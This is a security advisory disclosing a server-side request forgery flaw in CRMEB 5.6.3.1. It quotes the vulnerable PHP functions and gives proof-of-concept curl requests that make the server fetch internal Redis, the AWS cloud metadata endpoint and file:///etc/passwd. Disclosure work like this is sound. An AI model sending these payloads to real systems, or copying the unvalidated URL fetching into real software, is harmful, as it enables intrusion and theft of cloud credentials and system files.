CRMEB 5.6.3.1 Server-Side Request Forgery (SSRF) Vulnerability #2
Description
Supplier
https://github.com/crmeb/crmeb
Vulnerability File
app/common.php
Vulnerability Type
Server-Side Request Forgery (CWE-918)
Severity
High
Describe
Code analysis
In the app/common.php file, the image_to_base64 and put_image functions accept user-controlled URL parameters and make HTTP requests without validation, allowing Server-Side Request Forgery.
// Line 508-549 - image_to_base64 function
function image_to_base64($avatar = '', $timeout = 9)
{
// No URL validation
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $avatar); // User-controlled URL
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); // Follows redirects
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
// ...
$imgData = curl_exec($curl);
curl_close($curl);
return "data:image/jpeg;base64," . base64_encode($imgData);
}
// Line 558-587 - put_image function
function put_image($url, $filename = '')
{
// No URL validation
$imgData = file_get_contents($url); // User-controlled URL
// ...
}The functions do not validate:
- Protocol type (file://, gopher://, dict://, etc.)
- Target IP address (internal IPs, localhost, cloud metadata)
- Port numbers
POC
POST /api/image_base64 HTTP/1.1
Host: target.com
Content-Type: application/json
{"image":"http://127.0.0.1:6379/"}
Test internal Redis:
curl -X POST "http://target.com/api/image_base64" \
-H "Content-Type: application/json" \
-d '{"image":"http://127.0.0.1:6379/"}'Test cloud metadata (AWS):
curl -X POST "http://target.com/api/image_base64" \
-H "Content-Type: application/json" \
-d '{"image":"http://169.254.169.254/latest/meta-data/"}'Test file protocol:
curl -X POST "http://target.com/api/image_base64" \
-H "Content-Type: application/json" \
-d '{"image":"file:///etc/passwd"}'Result
SSRF confirmed. Can access internal services and cloud metadata endpoints.
[*] Internal Redis accessible
[*] Cloud metadata endpoint accessible
[*] Internal network scanning possible
Impact
An attacker can:
- Scan internal network infrastructure
- Access internal services (Redis, MySQL, etc.)
- Read cloud metadata (AWS, GCP, Azure)
- Access sensitive internal documents
- Potentially achieve remote code execution via Gopher protocol
Vendor Contact
References
- CWE-918: Server-Side Request Forgery (SSRF)
- https://cwe.mitre.org/data/definitions/918.html